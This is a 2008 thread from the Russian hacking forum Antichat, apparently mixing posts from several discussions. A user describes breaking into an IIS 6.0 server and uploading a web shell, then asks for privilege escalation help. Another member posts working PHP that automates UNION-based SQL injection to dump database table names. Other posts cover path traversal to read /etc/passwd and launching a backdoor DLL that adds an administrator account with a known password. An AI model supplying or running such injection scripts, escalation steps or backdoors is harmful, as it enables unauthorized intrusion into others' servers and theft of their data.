ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
нужна помощь по Microsoft-IIS/6.0 |
03.06.2008, 03:57
|
|
Новичок
Регистрация: 02.06.2008
Сообщений: 3
Провел на форуме:
33302
Репутация:
0
|
|
нужна помощь по Microsoft-IIS/6.0
добрый день, уважаемое сообщество!
срочно нужна помощь в следующем:
я кое-что сломал, но не до конца, залил туда шелл, но не могу попасть в некоторые директории и диски, пишет permissions denied
мне необходимо поднять права юзера на Microsoft-IIS/6.0
нужна dll-ка или софтина для увеличения привилегий
или можно сделать изменением regedit - но нужно узнать где именно в реестре лежит ключ чтоб поднять права, путь до ключа по умолчанию HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrenetVersionWinlogon, но в нашем случае он не там 
всем заранее спасибо за помощь. |
|
|
03.06.2008, 09:02
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
2 Sabe
Ну если версия 5 ( если майскуль ) то можно вручную извлечь из всех таблиц всю инфу с БД, также есть много скриптов на пхп и перл для автоматизации этого процесса. В ином случае никак бд не слить
|
|
|
|
03.06.2008, 09:42
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме:
137918
Репутация:
56
|
|
Сообщение от mosquito
добрый день, уважаемое сообщество!
срочно нужна помощь в следующем:
я кое-что сломал, но не до конца, залил туда шелл, но не могу попасть в некоторые директории и диски, пишет permissions denied
мне необходимо поднять права юзера на Microsoft-IIS/6.0
нужна dll-ка или софтина для увеличения привилегий
или можно сделать изменением regedit - но нужно узнать где именно в реестре лежит ключ чтоб поднять права, путь до ключа по умолчанию HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrenetVersionWinlogon, но в нашем случае он не там
всем заранее спасибо за помощь. Поищи на секлабе по ключу "повышение привелегий", найдешь много интересного, да, не помешала бы версия форточек, включая SP.
Последний раз редактировалось z3r0cool; 03.06.2008 в 09:50..
|
|
|
|
03.06.2008, 16:37
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
0nep@t0p
припустим что 5. можно пример запроса? или скрипт для автоматизации 
|
|
|
|
03.06.2008, 17:03
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
PHP код:
<?php
set_time_limit(0);
ignore_user_abort(true);
$s=1;
$f=39913;
$fph = fopen ("result.txt", 'a+');
for ($i=$s; $i<=$f; $i++) {
$aps = file_get_contents("[твой сайт и путь до уязвимого скрипта]=-1+union+select+concat(0x3a3a3a,table_name,0x3a3a3a )+from+information_schema.tables+limit+".$i.",1/*");
$res=null;
$pattern ="/:::(.+):::/";
preg_match_all($pattern, $aps, $out);
$res=array_values(array_unique($out[0]));
fputs ($fph, $res[0]."\r\n");
sleep (5);
}
fclose ($fph);
?>
Незабудь подправить запрос соответсвенно нуждам
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
03.06.2008, 18:11
|
|
Новичок
Регистрация: 02.06.2008
Сообщений: 3
Провел на форуме:
33302
Репутация:
0
|
|
Сообщение от z3r0cool
Поищи на секлабе по ключу "повышение привелегий", найдешь много интересного, да, не помешала бы версия форточек, включая SP.
Win Server 2003 R2
SP2
|
|
|
|
03.06.2008, 21:06
|
|
Познающий
Регистрация: 27.08.2007
Сообщений: 48
Провел на форуме:
91291
Репутация:
17
|
|
а шо значит ошибка 406?пыталась попасть в etc путь вида p=../etc/домен/&f=passwd ,ниче страшного если так и оставить,или лучше и это фильтровать?
|
|
|
|
03.06.2008, 21:09
|
|
Познающий
Регистрация: 27.08.2007
Сообщений: 48
Провел на форуме:
91291
Репутация:
17
|
|
ошибку эту знаю,всмысле оно ж все равно не даст файл открыть,или можна попытатьса?
|
|
|
|
03.06.2008, 22:31
|
|
Новичок
Регистрация: 02.06.2008
Сообщений: 3
Провел на форуме:
33302
Репутация:
0
|
|
нашел там в C:\Inetpub\wwwroot\da***\idq.dll, в которой прописан
There will add a Administrators User "iisuser",Its Password is "ab007".If you want to enter cmd.exe shell,please use ispc.exe.
как его запустить?
|
|
|
|
06.06.2008, 09:02
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме:
137918
Репутация:
56
|
|
Сообщение от l1ght
ничего не получается Значение параметра "npcs" передается в функцию js g_inintPath, там преобразоввывается 7 = База=>NPCs=>Humanoids, 7-1 = База=>NPCs=>Undead, и т.д.
Заметь, при значении 7-1 содержимое самого списка на странице не меняется, т.е. в скуль попадает только 7, а не 7-1, т.ч. параметр "npcs" фильтруется.
Последний раз редактировалось z3r0cool; 06.06.2008 в 09:05..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
